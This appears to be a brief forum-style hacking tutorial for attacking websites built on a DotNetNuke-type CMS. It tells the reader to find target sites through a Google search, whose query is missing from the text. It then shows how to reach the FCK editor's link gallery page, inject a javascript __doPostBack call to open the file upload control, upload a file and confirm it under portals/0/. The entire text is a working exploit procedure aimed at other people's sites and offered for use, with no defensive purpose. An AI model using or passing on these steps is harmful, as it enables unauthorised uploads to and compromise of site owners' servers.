Go to google and type:

now there will be several sites
somewhere you can upload files somewhere you can't
Now select one
in link there will be
/Home/tabid/36/Language/en-US/Default.aspx
now change that with
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Now it opens a "window"
Select File
than delete link and put
javascript:__doPostBack('ctlURL$cmdUpload','')
now select a .txt file and upload it
The file will be in root
if you want to see it type after the link
portals/0/filename.txt and that's it
